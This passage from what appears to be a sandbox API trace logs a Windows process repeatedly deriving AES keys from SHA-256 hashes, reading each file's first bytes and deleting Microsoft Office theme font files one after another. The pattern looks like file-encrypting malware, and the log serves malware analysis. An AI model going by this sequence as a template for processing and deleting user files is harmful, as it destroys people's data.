phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.691] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed4 [0159.691] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.693] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.693] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.693] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\foundry.xml")) returned 1 [0159.696] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.696] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.696] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.696] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.696] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe59 [0159.696] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.702] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.702] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.702] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.703] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\grid.xml")) returned 1 [0159.704] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.705] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.705] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.705] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.705] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf09 [0159.705] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.707] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.707] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.707] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\hardcover.xml")) returned 1 [0159.710] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.710] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.710] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.710] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.710] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe2a [0159.710] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.712] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.712] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.712] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\horizon.xml")) returned 1 [0159.715] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.715] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.715] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.715] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.715] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeed [0159.715] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.717] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.717] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.717] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml")) returned 1 [0159.719] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.720] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.720] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.720] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.720] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe13 [0159.720] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.722] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.722] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.722] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.723] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml")) returned 1 [0159.724] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.725] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.725] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.725] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.725] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe05 [0159.725] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.727] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.727] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.727] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.728] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml")) returned 1 [0159.729] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.730] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.730] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.730] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.730] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe39 [0159.730] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.732] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.732] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.732] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.733] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\newsprint.xml")) returned 1 [0159.734] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.735] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.735] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.735] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.735] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe15 [0159.735] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.737] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.737] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.737] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office 2.xml")) returned 1 [0159.740] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.741] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.741] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.741] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.741] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe01 [0159.741] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.749] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.749] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.749] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.750] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic 2.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic 2.xml")) returned 1 [0159.751] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.752] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.752] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.752] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.752] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe20 [0159.752] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.754] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.754] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.754] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Office Classic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\office classic.xml")) returned 1 [0159.756] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.757] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.757] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.757] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.757] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe1d [0159.757] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.759] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.759] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.759] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.760] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\opulent.xml")) returned 1 [0159.770] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.771] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.771] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.771] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.771] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe5a [0159.771] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.773] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.773] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.773] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml")) returned 1 [0159.775] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.776] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.776] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.776] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.776] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeed [0159.776] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.789] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.789] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.789] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.790] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml")) returned 1 [0159.792] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.792] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.792] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.792] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.792] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe2c [0159.792] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.805] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.805] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.805] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.807] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml")) returned 1 [0159.808] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.808] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.808] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.808] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.808] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe0f [0159.808] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.810] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.810] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.810] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\perspective.xml")) returned 1 [0159.813] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.813] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.813] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.814] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.814] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe7f [0159.814] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.830] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.830] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.830] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.832] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\pushpin.xml")) returned 1 [0159.833] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.833] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.833] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.833] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.833] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe18 [0159.833] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.854] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.854] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.854] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\slipstream.xml")) returned 1 [0159.857] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.857] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.857] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.857] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.857] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xee9 [0159.857] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.859] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.859] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.859] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.860] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Solstice.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\solstice.xml")) returned 1 [0159.861] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.862] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.862] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.862] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.862] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe13 [0159.862] 